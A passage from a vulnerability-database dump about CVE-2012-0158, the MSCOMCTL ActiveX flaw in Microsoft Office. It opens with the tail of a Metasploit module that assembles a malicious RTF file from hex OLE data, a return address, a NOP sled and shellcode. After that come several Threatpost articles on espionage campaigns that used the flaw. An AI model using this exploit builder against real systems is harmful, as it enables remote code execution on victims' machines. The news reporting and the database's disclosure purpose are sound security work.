\"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\" \ncontent << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\" \ncontent << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\" \ncontent << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF52006F006F007400200045006E007400\" \ncontent << \"72007900000000000000000000000000000000000000000000000000000000000000000000000000\" \ncontent << \"000000000000000016000500FFFFFFFFFFFFFFFF020000004BF0D1BD8B85D111B16A00C0F0283628\" \ncontent << \"0000000062eaDFB9340DCD014559DFB9340DCD0103000000000600000000000003004F0062006A00\" \ncontent << \"49006E0066006F000000000000000000000000000000000000000000000000000000000000000000\" \ncontent << \"0000000000000000000000000000000012000200FFFFFFFFFFFFFFFFFFFFFFFF0000000000000000\" \ncontent << \"00000000000000000000000000000000000000000000000000000000000000000600000000000000\" \ncontent << \"03004F00430058004E0041004D004500000000000000000000000000000000000000000000000000\" \ncontent << \"000000000000000000000000000000000000000000000000120002010100000003000000FFFFFFFF\" \ncontent << \"00000000000000000000000000000000000000000000000000000000000000000000000001000000\" \ncontent << \"160000000000000043006F006E00740065006E007400730000000000000000000000000000000000\" \ncontent << \"000000000000000000000000000000000000000000000000000000000000000012000200FFFFFFFF\" \ncontent << \"FFFFFFFFFFFFFFFF0000000000000000000000000000000000000000000000000000000000000000\" \ncontent << \"00000000020000007E05000000000000FEFFFFFFFEFFFFFF03000000040000000500000006000000\" \ncontent << \"0700000008000000090000000A0000000B0000000C0000000D0000000E0000000F00000010000000\" \ncontent << \"11000000120000001300000014000000150000001600000017000000FEFFFFFFFFFFFFFFFFFFFFFF\" \ncontent << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\" \ncontent << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\" \ncontent << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\" \ncontent << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\" \ncontent << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\" \ncontent << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\" \ncontent << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\" \ncontent << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\" \ncontent << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\" \ncontent << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\" \ncontent << \"FFFFFFFFFFFFFFFF0092030004000000000000000000000000000000000000000000000000000000\" \ncontent << \"00000000000000000000000000000000000000000000000000000000000000004C00690073007400\" \ncontent << \"56006900650077004100000000000000000000000000000000000000000000000000000000000000\" \ncontent << \"0000000000000000000000000000000021433412080000006ab0822cbb0500004E087DEB01000600\" \ncontent << \"1C000000000000000000000000060001560A000001EFCDAB00000500985D65010700000008000080\" \ncontent << \"05000080000000000000000000000000000000001FDEECBD01000500901719000000080000004974\" \ncontent << \"6D736400000002000000010000000C000000436F626A640000008282000082820000000000000000\" \ncontent << \"000000000000\" \ncontent << ret_address \ncontent << \"9090909090909090\" \ncontent << shellcode \ncontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\" \ncontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\" \ncontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\" \ncontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\" \ncontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\" \ncontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\" \ncontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\" \ncontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\" \ncontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\" \ncontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\" \ncontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\" \ncontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\" \ncontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\" \ncontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\" \ncontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\" \ncontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\" \ncontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\" \ncontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\" \ncontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\" \ncontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\" \ncontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\" \ncontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\" \ncontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\" \ncontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\" \ncontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\" \ncontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\" \ncontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\" \ncontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\" \ncontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\" \ncontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\" \ncontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\" \ncontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\" \ncontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\" \ncontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\" \ncontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\" \ncontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\" \ncontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\" \ncontent << \"00000000000000\" \ncontent << \"\\n\" \ncontent << \"}\" \ncontent << \"}\" \ncontent << \"}\" \n \nprint_status(\"Creating '#{datastore['FILENAME']}' file ...\") \nfile_create(content) \n \nend \n \nend \n`\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/112176/ms12_027_mscomctl_bof.rb.txt"}], "threatpost": [{"lastseen": "2018-10-06T22:57:56", "bulletinFamily": "info", "cvelist": ["CVE-2012-0158"], "description": "A Russian APT group tied to ongoing attacks against military and political targets in Eastern Europe and against NATO could also have ties to the [MiniDuke espionage campaign](<http://threatpost.com/miniduke-espionage-malware-hits-governments-europe-using-adobe-exploits-022713/77569>) uncovered more than a year ago.\n\nDubbed [APT28](<http://www.fireeye.com/resources/pdfs/apt28.pdf>) by FireEye in a report published last night, the Russian hackers have targeted Eastern European governments and military organizations, the government of the country of Georgia, as well as NATO and the Organization for Security and Cooperation in Europe (OSCE). The group, FireEye said, operates as a professional team with indicators of long-term software development planning and operational security tactics in place. They operate during business hours, on Moscow time, and use phishing lures specific to government and military officials of political and strategic value to the Russian government, the report said.\n\nKaspersky Lab Global Research & Analysis Team expert Aleks Gostev said this same group is also known as Sofacy and may have ties to the MiniDuke campaign. The [MiniDuke campaign also was used for political and military espionage](<http://threatpost.com/miniduke-apt-campaign-returns-with-new-targets-hacking-tools/107008>) but relied on a number of unusual tactics in a shotgun-style approach with 59 victims in 23 countries, most of those in Europe.\n\nLike MiniDuke, APT28 relies on phishing emails to penetrate organizations. The messages are spiked with convincing decoy documents that kick off a string of infections and backdoors where stolen information is ultimately encrypted and sent to a command and control server.\n\nLaura Galante, manager of threat intelligence at FireEye, said they have not been able to determine how successful APT28 has been with these three particular sets of targets.\n\n\u201cThat\u2019s part of the open question,\u201d Galante said. \u201cWe can see the targets in Eastern Europe by the lures they use and domains they\u2019ve registered, but we don\u2019t have perfect visibility on what they\u2019re doing with the targets they\u2019re able to compromise. If you can get into the email of an Eastern European military attache, what are they doing with the stolen communication? I would wager they\u2019re probably using it to think about their own policy decisions and shape their responses to military and political affairs.\u201d\n\nGalante said the malware and attack tools have been regularly updated and refined since 2007.\n\nGalante said the malware and attack tools have been regularly updated and refined since 2007. The development platforms are flexible and built for long-term use, and the coders are skilled not only at building custom malware, but also coding in barriers that complicate reverse engineering and other forensic analysis.\n\nFireEye said in its report that the malware samples include Russian language settings and were compiled in a Russian language build environment starting in 2007\u2014more than 96 percent of the samples were compiled between Monday and Friday and 89 percent between 8 a.m. and 6 p.m. UTC+4 time zone, FireEye said.\n\nThree primary targets all have political or military value to the Russian government. Attacks on one target, the Georgian government, ramped up following the 2008 war with Georgia and that country\u2019s subsequent growing ties to the West. Specifically, attacks against the Georgian Ministry of Internal Affairs and the Ministry of Defense were carried out. Spear phishing attacks tailored to particular people or organizations at each ministry were found, each with a different exploit for a Microsoft Office vulnerability.\n\n\u201cIn general, the group relies on older exploits, such as CVE-2012-0158, and it does not appear to be as sophisticated in terms of technical skills as other groups, for instance [Turla](<http://threatpost.com/epic-operation-kicks-off-multistage-turla-apt-campaign/107612>),\u201d Kaspersky\u2019s Gostev said.\n\nSeparate attacks were also discovered against the Eastern European Ministry of Foreign Affairs, the Polish government, NATO, OSCE, defense attaches working in Eastern European countries, and even attendees of European defense exhibitions, each following a similar pattern as other APT28 attacks, FireEye said.\n\n\u201cThe malware used in these attacks has some interesting features, but when you\u2019re thinking about how they\u2019re getting on networks, they\u2019re still relying on spear phishing,\u201d Galante said. \u201cThey\u2019re still requiring and dependent on a user mistake to get on a network.\u201d\n\nThe malware, Galante said, is custom built by the group. Once a victim opens a spear phishing email and executes the malware tucked in the tainted Office attachment, a dropper malware loads the Sofacy downloader which grabs second-stage malware from a command and control server, Galante said. A backdoor is established for anything from shellcode execution, credential theft and system monitoring. Implants are then dropped onto the victim\u2019s machine that include counter reverse-engineering features that disrupt static analysis of the malware. Stolen data is protected with RSA encryption as it moves from the victim to the controller, FireEye said.\n\nUnlike Chinese APT groups that have been unmasked, Galante said Russian groups don\u2019t generally steal intellectual property.\n\n\u201cWith the Russian group, the victim set is narrow and the type of operations occurring are distinct from intellectual property and financial data theft that the Chinese groups focus on,\u201d Galante said. \u201cThe majority of Chinese groups go after trade secrets to help their state-owned enterprises in China. Sure there is a military and political application to a lot of the information taken by Chinese groups, but the defining feature is secrets from economic sectors.\u201d\n", "modified": "2014-10-28T16:23:03", "published": "2014-10-28T12:23:03", "id": "THREATPOST:40683E270B24D8E2F0A7F7F90FDFE9A6", "href": "https://threatpost.com/russian-apt28-group-linked-to-nato-political-attacks/109049/", "type": "threatpost", "title": "Russian APT28 Group Linked to NATO, Political Attacks", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:00:47", "bulletinFamily": "info", "cvelist": ["CVE-2012-0158"], "description": "A new malware campaign has been hitting Pakistan hard over the last few months and after a little e-sleuthing, it appears the not-so-stealthy attacks have been originating from nearby India and exploiting a certificate to run its binaries.\n\nSecurity firm Eset has a full rundown of the campaign today on its [WeliveSecurity.com](<http://www.welivesecurity.com/2013/05/16/targeted-threat-pakistan-india/>) blog by malware researcher Jean-Ian Boutin, including an array of details involving how the attack has been executed and the types of payloads being deployed on unsuspecting Pakistanis\u2019 computers.\n\nThis campaign relies on the exploitation of a bogus, digitally signed certificate from the Indian company Technical and Commercial Consulting Pvt. Ltd. Initially issued in 2011 and revoked for files used after March 2012. Still though the cert was still used to sign more than 70 different malicious binaries on and off from that March until September of that year.\n\nThe malware uses two vectors \u2013 the first is a well-known Word document vulnerability, CVE-2012-0158, that\u2019s been used in everything from the [Red October campaign](<http://threatpost.com/rocra-espionage-malware-campaign-uncovered-after-five-years-activity-011413/>) to a bevy of [attacks against Tibetan and Uyghur users](<http://threatpost.com/researchers-uncover-targeted-attack-campaign-using-android-malware-032613/>) as of late. The other vector spread Word and PDF files that once opened, \u201cdownloads and executes additional malicious binaries.\u201d Some of those files are disguised as \u201cpakistandefencetoindiantopmiltrysecreat.exe\u201d and \u201cpakterrisiomforindian.exe,\u201d according to the blog post.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2013/05/07045755/pakistan_india.jpg>)\n\nPayloads are set up to glean data \u2013 screenshots, keystrokes, documents in the computer\u2019s trash \u2013 from users\u2019 computers and in turn send them to the attackers\u2019 servers. Interestingly enough, as Boutin notes, the information is being uploaded to the attacker\u2019s computer unencrypted, so it\u2019s easy to see what exactly is being transferred.\n\nThe blog also notes a number of Indian connections, including the mysterious Indian code signing certificate, references to Indian culture in the binaries and signing timestamps between 5:06 and 13:45, consistent with eight hour shifts worked in India.\n\nAn accompanying graph in the blog entry suggests that while other nations are being hit by the campaign, it\u2019s largely affecting Pakistan, with 79 percent of the targets affecting that South Asian country.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2013/05/07045751/detection_distribution.png>)\n\nA similar type of malware, [Redpill](<http://threatpost.com/data-stealing-spyware-redpill-back-targeting-india-041113/>), was found hijacking users in India last month. That campaign also stole screenshots, in addition to bank account credentials and email information and was the second coming of a malware strain that made its first appearance in 2008.\n\nBoutin\u2019s full research on the malware targeting Pakistan is being presented at the Caro Workshop, a security conference in Bratislava, Slovakia tomorrow. For more on his research, head to [ESET\u2019s blog](<http://www.welivesecurity.com/2013/05/16/targeted-threat-pakistan-india/>).\n", "modified": "2013-05-16T20:04:21", "published": "2013-05-16T16:04:21", "id": "THREATPOST:7719EB430C620858B2504EA847A9A096", "href": "https://threatpost.com/new-india-based-spy-malware-campaign-targeting-pakistanis/100664/", "type": "threatpost", "title": "Spyware Campaign Originating in India Targeting Pakistanis", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:00:38", "bulletinFamily": "info", "cvelist": ["CVE-2012-0158"], "description": "Never let it be said that attackers don\u2019t keep up with the news. The crew behind the [NetTraveler cyberespionage attacks](<https://threatpost.com/net-traveler-espionage-campaign-uncovered-links-to-gh0st-rat-titan-rain-found/>) is now using the news about the NSA\u2019s PRISM surveillance program as bait in a new spear-phishing campaign.\n\nSecurity researcher Brandon Dixon of 9bplus came across a malicious email this week that plays off the recent spate of news stories about the leaked data on the National Security Agency\u2019s PRISM program, which is designed to gather data on users from a variety of large Internet companies, reportedly including Microsoft, Apple, Google and others. The email is designed to look like it was sent by Jill Kelley, the woman who helped expose the affair that David Petraeus was having.\n\nDixon said that the message was targeted at someone involved with the Regional Tibet Youth Congress in India and included a malicious Word document that had many of the earmarks of the tactics used by the NetTraveler attackers.\n\n\u201cThe attachment is a Word document labeled \u2018Monitored List 1.doc\u2019, exploiting the always favored CVE-2012-0158 and can be tied back to the same actors involved in the [NetTraveler campaigns](<https://media.threatpost.com/wp-content/uploads/sites/103/2013/06/22105818/kaspersky-the-net-traveler-part1-final.pdf>) brought to light by Kaspersky. It\u2019s funny to note that these actors are keeping up with their same techniques and infrastructure (not all of it) despite being 100% outed. Again, this sort of behavior shows poor operational security or a complete lack of care,\u201d Dixon wrote in his [analysis of the email](<http://blog.9bplus.com/prism-lure-in-use-by-nettraveler-attackers/>).\n\nThe text of the email is crammed with somewhat nonsensical text mentioning the [NSA PRISM program](<https://threatpost.com/always-outmanned-always-outgunned/>), Edward Snowden, the former NSA contractor responsible for the leaks, and the CIA. Once the malicious Word document is opened on a target machine, it writes several files to the hard drive, including one named \u201cdw20.exe\u201d, which has been seen in use by the NetTraveler crew in the past. Dixon said he wasn\u2019t able to identify the IP address or command and control server associated with the email campaign, but he believes there are likely additional emails out there like the one he found.\n\n\u201cWhatever the domain or IP address used in the attack is, you can be sure that there will be other emails and malicious documents like it. The NetTraveler attackers have been going strong since the early 2007-2008\u2032s and I doubt they will be stopping anytime soon,\u201d Dixon said.\n\nKurt Baumgartner, a security researcher at Kaspersky Lab who did some of the original research on the NetTraveler campaign, said the group behind the attacks is oddly incautious in its tactics.\n\n\u201cThese groups are surprisingly bold. Not only did we see this group maintain backdoors on their victim systems alongside Red October backdoors, but the NetTravler infrastructure continues to be in active use even after the operation has moved out of the shadows and into the public light,\u201d he said.\n\n_Image from Flickr photos of [LadyDragonflyCC](<https://secure.flickr.com/photos/ladydragonflyherworld/>). _\n", "modified": "2018-03-22T14:58:21", "published": "2013-06-18T10:00:42", "id": "THREATPOST:849E78B2F5C0D699337829FD6D6F8AE4", "href": "https://threatpost.com/nettraveler-attackers-using-nsa-prism-program-as-bait/101006/", "type": "threatpost", "title": "NetTraveler Attackers Using PRISM Program as Bait", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:01:05", "bulletinFamily": "info", "cvelist": ["CVE-2012-0158"], "description": "With antiquated gear running the country\u2019s industrial control systems that oversee critical infrastructure, it\u2019s no shock attackers targeting SCADA networks do their fair share of reconnaissance looking for weak spots in that equipment.\n\nA researcher decided to put that theory to a practical test recently when he deployed three dummy websites, honeypots essentially, that accurately mimicked Internet-facing management interfaces for a real-world water pressure station, a server hosting a human machine interface (HMI) system and another machine hosting a real programmable logic controller (PLC).\n\nWhat threat researcher Kyle Wilhoit of Trend Micro found during a 28-day trial was that attackers are determined to access SCADA networks and ICS devices and come armed not only with working knowledge of devices and their default configurations, but with purpose-built malware, and the desire to modify industrial processes if they\u2019re able to successfully access a system.\n\n\u201cI didn\u2019t expect the attack scenarios I saw happen,\u201d Wilhoit told Threatpost. \u201cI didn\u2019t expect attackers to look at the site admin stuff and deeper into the company behind the gear. I can now draw a parallel to the reconnaissance attackers do on companies and infrastructure; we see a lot of those parallels on devices now.\u201d\n\nDuring the trial, 39 attacks were carried out against the honeypots, originating in 14 countries, most of them coming from China, Laos and the United States. For the purposes of his [research](<http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-whos-really-attacking-your-ics-equipment.pdf>), which was presented at Black Hat EU last week, Wilhoit did not consider automated port scans and SQL injection attempts as attacks. The only attempts considered attacks were those that were a threat to a secure area of the websites, attempts to modify a controller, attacks on specific SCADA protocols such as Modbus, and attempts to gain access to cause damage.\n\nThe sites were left exposed online with default configurations, including default credentials such as admin/admin or SA/SA. Text on the sites was optimized for search engines so that Google and others would easily find them, and the server names, for example, were fairly attractive names such as SCADA-1.\n\nThe result was a disturbing view into the activities around these critical systems. One incursion was able to gain access to a supposed water pumping station and shut it down or modify water output temperatures, in one case to 170 degrees Fahrenheit.\n\n\u201cThey logged in, made a modification and logged out,\u201d Wilhoit said. \u201cThese were repeat attacks based on default credentials for specific ICS and SCADA equipment. They were able to modify it directly and perform what was perceived to be catastrophic damage. They definitely thought they were successful.\u201d\n\nWilhoit said 12 of the attacks were unique and targeted the specific equipment in use; 13 were repeated by the same attackers, indicating some sort of automation and targeting. Some attackers would come back at the same times twice a day and try to exploit the same vulnerabilities over and over, or move on to new attacks once they were unable to exploit one.\n\nMost of the attacks logged by the honeypots were unauthorized access attempts to diagnostics pages, or attempts to modify Modbus traffic; Modbus is a communications protocol specific to ICS and SCADA equipment. One of the malware attacks originated with a spear phishing email carrying a malicious Word document exploiting [CVE-2012-0158](<http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0158>), a vulnerability that enables remote code execution used in many targeted attacks. Another attack attempted to use an unauthorized Modbus client to gain read/write access to the PLC honeypot, a sign reconnaissance is occurring, Wilhoit said.\n\nThe bigger question, however, is why. Why is this gear online with default credentials and configurations and how many attacks where pumping stations are shut down or water temperature is modified occur?\n\n\u201cThe primary reason this is occurring is that these systems were deployed 20 to 30 years ago, prior to security architecture being the way it is today,\u201d Wilhoit said. \u201cThe technology gap has gotten a lot larger, and ICS hasn\u2019t caught up to where security infrastructure is at right now. It\u2019s difficult for devices to be turned down; that will halt business in that sector for some time. If you reboot a server, coal is not coming out of the ground. That affects the bottom line.\n\n\u201cIt also begs the question: Are companies disclosing it, or are they even aware it\u2019s occurring,\u201d Wilhoit said. \u201cThere\u2019s quite a big separation from the security guy and the ICS engineer whose main responsibility is to ensure devices stay up and are operational. Would they even be aware? I don\u2019t know, but I\u2019d be comfortable in saying these types of attacks are occurring.\u201d\n", "modified": "2013-05-07T19:38:25", "published": "2013-03-19T19:04:12", "id": "THREATPOST:BBF9233468A677A95C5E9D149089804E", "href": "https://threatpost.com/attacks-scada-ics-honeypots-modified-critical-operations-031913/77642/", "type": "threatpost", "title": "Attacks on SCADA, ICS Honeypots Modified Critical Operations", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:57:43", "bulletinFamily": "info", "cvelist": ["CVE-2012-0158"], "description": "The attackers behind the [Red October APT campaign](<https://threatpost.com/rocra-espionage-malware-campaign-uncovered-after-five-years-activity-011413>) that was exposed nearly two years ago have resurfaced with a new campaign that is targeting some of the same victims and using similarly constructed tools and spear phishing emails.\n\nRed October emerged in January 2013 and researchers found that the attackers were targeting diplomats in some Eastern European countries, government agencies and research organizations with malware that could steal data from desktops, mobile devices and FTP servers. The attackers had a wide variety of tools at their disposal and used unique victim IDs and had exploits for a number of vulnerabilities. The Red October attacks began with highly targeted spear phishing emails, some of which advertised a diplomatic car for sale.\n\nThe new CloudAtlas campaign, disclosed Wednesday by researchers at Kaspersky Lab, also uses that same spear phishing lure and as targeted some of the same victims hit by Red October. Researchers believe the same group may be behind both campaigns, based on similarities in tactics, tools and targets.\n\n\u201cIn August 2014, some of our users observed targeted attacks with a variation of [CVE-2012-0158](<http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0158>) and an unusual set of malware. We did a quick analysis of the malware and it immediately stood out because of certain unusual things that are not very common in the APT world,\u201d researchers at Kaspersky said in an [analysis](<https://securelist.com/blog/research/68083/cloud-atlas-redoctober-apt-is-back-in-style/>) of the attack. \n\n\u201cAt least one of them immediately reminded us of RedOctober, which used a very similarly named spearphish: \u201cDiplomatic Car for Sale.doc\u201d. As we started digging into the operation, more details emerged which supported this theory. Perhaps the most unusual fact was that the Microsoft Office exploit didn\u2019t directly write a Windows PE backdoor on disk. Instead, it writes an encrypted Visual Basic Script and runs it.\u201d\n\nBoth Red October and CloudAtlas have targeted the same victims. Not just the same organizations, but some of the same machines.\n\nBoth Red October and CloudAtlas have targeted the same victims. Not just the same organizations, but some of the same machines. In one case, a machine was attacked only twice in the last two years, once by Red October and once by CloudAtlas. Both campaigns also hit victims in the same countries: Russia, Belarus, Kazakhstan and India. The two campaigns also use similar malware tools.\n\n\u201cBoth Cloud Atlas and RedOctober malware implants rely on a similar construct, with a loader and the final payload that is stored encrypted and compressed in an external file. There are some important differences though, especially in the encryption algorithms used \u2013 RC4 in RedOctober vs AES in Cloud Atlas,\u201d Kaspersky researchers said.\n\n\u201cThe usage of the compression algorithms in Cloud Atlas and RedOctober is another interesting similarity. Both malicious programs share the code for LZMA compression algorithm. In CloudAtlas it is used to compress the logs and to decompress the decrypted payload from the C&C servers, while in Red October the \u2018scheduler\u2019 plugin uses it to decompress executable payloads from the C&C.\u201d\n\nThe C2 infrastructure for the CloudAtlas campaign is somewhat unusual. The attackers are using accounts at Swedish cloud provider CloudMe to communicate with compromised machines.\n\n\u201cThe attackers upload data to the account, which is downloaded by the implant, decrypted and interpreted. In turn, the malware uploads the replies back to the server via the same mechanism,\u201d the researchers said.\n\nOfficials at CloudMe said on Twitter that they are working to delete any CloudAtlas C2 accounts.\n\n\u201cYes, we are permanently deleting all accounts that we can identify as involved in the [#inception](<https://twitter.com/hashtag/inception?src=hash>) [#cloudatlas](<https://twitter.com/hashtag/cloudatlas?src=hash>) [#apt](<https://twitter.com/hashtag/apt?src=hash>) [#surveillance](<https://twitter.com/hashtag/surveillance?src=hash>),\u201d the company [said](<https://twitter.com/CloudMe_com/status/542636290274246656>).\n\nResearchers at Blue Coat have also looked at the new campaign, which they\u2019ve named Inception, and found that the attackers have created tools to compromise a variety of mobile platforms, as well.\n\n\u201cThe framework continues to evolve. Blue Coat Lab researchers have recently found that the attackers have also created malware for Android, BlackBerry and iOS devices to gather information from victims, as well as seemingly planned MMS phishing campaigns to mobile devices of targeted individuals. To date, Blue Coat has observed over 60 mobile providers such as China Mobile, O2, Orange, SingTel, T-Mobile and Vodafone, included in these preparations, but the real number is likely far higher,\u201d Snorre Fagerland and Waylon Grange from Blue Coat Lab wrote.\n\n_Image from Flickr photos of [Kevin Dooley](<https://www.flickr.com/photos/pagedooley/>). _\n", "modified": "2014-12-11T17:50:33", "published": "2014-12-10T11:12:07", "id": "THREATPOST:3DFDEBADB4BEE8782EFBEA4D06EB5605", "href": "https://threatpost.com/red-october-attackers-return-with-cloudatlas-apt-campaign/109806/", "type": "threatpost", "title": "Red October Attackers Return With CloudAtlas APT Campaign", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:02:15", "bulletinFamily": "info", "cvelist": ["CVE-2012-0158"], "description": "[](<https://threatpost.com/tool-scans-rtf-files-spreading-malware-targeted-attacks-091412/>)Exploits embedded inside Microsoft Office documents such as Word, PDFs and Excel spreadsheets have been at the core of many targeted attacks during the past 24 months. Detection of these attack methods is improving and nimble hackers are recognizing the need for new avenues into enterprise networks. Some have been finding success using rich text format (RTF) files to spread malware that exploits Office vulnerabilities.\n\nResearcher Mila Parkour reported in June she\u2019d collected 90 RTF files over the course of three months, many with China-related file names and many [targeting specific industries](<http://contagiodump.blogspot.com/2012/06/90-cve-2012-0158-documents-for-testing.html>). All of them were exploiting [CVE-2012-0158](<http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0158>), a [vulnerability in Active X controls within MSCOMCTL.OCX](<http://technet.microsoft.com/en-us/security/bulletin/ms12-027>)\u2013OLE files developed by Microsoft to allow object linking and embedding to documents and other files. Successful exploits allow remote attackers to execute code over the Web, Office docs, or RTF files.\n\n\u201cMany believe RTF is a relatively safe format, just as it was back in the day when people might not trust Word docs and would send PDFs around instead. Today, we chuckle at that,\u201d said Lenny Zeltser, a handler at the SANS Internet Storm Center. \u201cToday, Word and PDF documents are risky and people are sending RTF files. We can now see attackers finding ways to use RTF files in exploits.\u201d\n\nSome of the samples in the wild have been fairly sophisticated and difficult to examine, Zeltser said. Some, for example, have contained embedded portable executable files that are a challenge to find and extract without some heavy manual lifting. German security researcher Frank Boldewin, keeper of the [OfficeMalScanner toolkit](<http://reconstructer.org/main.html>), is among those recognizing this new trend. He updated the popular, freely available tool with RTFScan that can help identify RTF-based exploits and extract embedded artifiacts for examination.\n\n\u201cThe tool is fantastic for analyzing malicious RTF files,\u201d Zeltser said. \u201cAttackers are using more sophisticated ways of concealing artifacts in RTF files, which makes them harder to examine. The tool is designed to help a trained security analyst figure out the nature of the file, and if it\u2019s exploited, what happens next.\u201d\n\nIn one example posted on the ISC Diary today,[ RTFScan was able to find an embedded OLE object](<https://isc.sans.edu/diary/Analyzing+Malicious+RTF+Files+Using+OfficeMalScanner+s+RTFScan/14092>) that included the attacker\u2019s shellcode that would be executed by a vulnerable Word doc, Zeltser wrote. RTFScan was able to get around the obfuscation in place and extract the malicious embedded executable.\n\n\u201cRTFScan tells you where to find the shellcode, extract it and turn it into a Windows executable,\u201d he said. \u201cThis would allow an analyst to debug it and observe what happens after it executes, how the malware behaves. This is very important for analysts because the frequency of using Microsoft Office docs continues to be very common. The number of attacks is not shrikning and attackers find all sorts techniques to deliver payloads delivered with the help of Word, PDF, Excel and now RTF documents.\u201d\n", "modified": "2013-04-17T16:31:32", "published": "2012-09-14T17:25:21", "id": "THREATPOST:A617AB8E3147511D6E87F9782597BB64", "href": "https://threatpost.com/tool-scans-rtf-files-spreading-malware-targeted-attacks-091412/77014/", "type": "threatpost", "title": "Tool Scans for RTF Files Spreading Malware in Targeted Attacks", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:56:01", "bulletinFamily": "info", "cvelist": ["CVE-2012-0158"], "description": "An APT gang linked to China and alleged to be responsible for targeted attacks 